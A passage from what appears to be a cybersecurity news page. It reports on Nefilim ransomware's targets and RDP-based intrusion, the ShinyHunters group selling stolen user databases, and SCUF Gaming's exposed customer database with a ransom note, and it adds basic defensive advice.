Since April 2020, Nefilim has targeted multiple organizations around the globe, narrowing down on the regions- South Asia, South America, Oceania, North America, and Western Europe. Going by the count of attacks disclosed publicly, manufacturing comes on top as the most preferential and hence the most targeted industries by the operators of Nefilim ransomware; Mas Holdings, Fisher & Paykel, Aban Offshore Limited, Stadler Rail were some of the major targets. Other industries infiltrated by Nefilim are communication and transportation; Orange S.A. and Toll Group, Arteris SA being some of the top targets respectively. One important thing to notice here is that the ransomware has spared the healthcare and education sector entirely as of now, interestingly, no organization from the two aforementioned sectors has been targeted.

Nefilim uses a number of ways including P2P file sharing, Free software, Spam email, Torrent websites, and Malicious websites, to infiltrate organizations’ IT systems. Designed specially to penetrate Windows PCs, Nefilim actively abuses Remote Desktop Protocol and uses it as its primary attack vector to infiltrate organizations. It employs a combination of two distinct algorithms AES-128 and RSA-2048 to encrypt the target’s data that is later leaked on their websites known as Corporate Leaks- when victims’ fail to pay the ransom.

Users are advised to stay wary of exposed ports and security departments shall ensure closing off unused ports, experts have also recommended to ‘limit login attempts’ for Remote Desktop protocol network admin access from settings to stay guarded.

'ShinyHunters', a Hacker Group Selling Databases of 10 Organization on the Dark Web for $18,000


A group of hackers has put the user databases of 10 companies for sale on the dark web, a part of the internet world that requires specialized software to be accessed, it isn't normally visible to search engines. 

The group that is selling more than 73.2 million user records goes by the name of 'Shinyhunters' and was reportedly behind the breach of Indonesia's biggest online store, Tokopedia. Notably, it's the success of Tokopedia's breach that has encouraged the hackers to steal and sell data from various organizations including Zoosk (online dating app, 30 million records), Minted (online marketplace, 5 million records), Chatbooks (Printing service, 15 million records), Mindful (Health magazine, 2 million records), Bhinneka (Indonesia online store, 1.2 million records), Home Chef (Food delivery service, 8 million records) and others. The samples of the aforementioned stolen records have been shared by the hackers; security experts have verified the same to confirm the authenticity of most of the databases that are being sold separately by the hackers for almost $18,000. However, the legitimacy of some of the enlisted user records is yet to be proved. Despite the ambiguity and confusion, ShinyHunters seems to be a well-founded threat actor as per community sources. 

In the last week's breach targeting Tokopedia, initially, hackers published 15 million user records for free, however, later on, the organization's full database containing around 91 million records was put on sale for $5,000. 

Allegedly the hacker group has also been involved in the data breach of a very popular Facebook-funded education initiative, Unacademy, the breach affected a total of 22 million user records. 

Reports indicate that the data posted by hackers contain authentic databases that could lead to serious concerns for all the affected organizations, although there are limited insights available about ShinyHunters, the modus-operandi of the hacker group resembles that of Gnosticplayers, a computing hacking group that made headlines for selling stolen data of the dark web with its latest victim being Zynga Inc, a mobile social game company.

1.1 Million Customers Records of SCUF Gaming Exposed Online


The database of more than 1 million customers was exposed online by 'SCUF Gaming', a subsidiary of Corsair that develops high-end gamepads for Xbox, PS4, and PC. The incident led to the exposure of clients' names, payment info, contact info, repair tickets, order histories, and other sensitive information. Other data belonging to the company's staff and internal API keys were also compromised as a result.

The data was left unprotected for two days before being discovered by the security researcher, Bob Diachenko who reported the same to Scuf Gaming. The team led by the researcher found the data on the web without any password protection or authentication.

The database was taken down by the company in less than two hours of being notified. Meanwhile, bot crawlers got enough time to locate the exposed database and a ransom note was found demanding 0.3 BTC from the company. The note says that the data had been downloaded by the cybercriminals, however, no such action is being detected by the systems. "Your Database is downloaded and backed up on our secured servers. To recover your lost data, Send 0.3 BTC to our BitCoin Address and Contact us by eMail.” The note read.

Experts are of the belief that the involved criminals did not get enough time to delete or encrypt the data present in the database, hence, it's unlikely that they would have been able to download it either. However, SCUF clients and staff could face a risk of phishing attacks, identity theft, and fraud by the cybercriminals who might have downloaded some pieces of
the leaked database.

In a conversation with Comparitech, a spokesperson for Corsair, parent company to SCUF gaming told, “…Once notified, we identified the root cause of this exposure and secured the database within two hours. While investigating Mr. Diachenko’s warning, we also discovered that a bot had connected to the database’s server and placed a ransom note there. We have no evidence that either the bot or any other actor was able to misappropriate customer data.

This issue was specific to one system, being operated off-site due to work-from-home precautions resulting from the current COVID-19 pandemic.”

To stay on a safer side, SCUF Gaming customers are advised to keep an eye for any suspicious activity in regard to their bank accounts as scammers who were to able gather whatever bits of information they could, are likely to attempt targeted phishing attacks.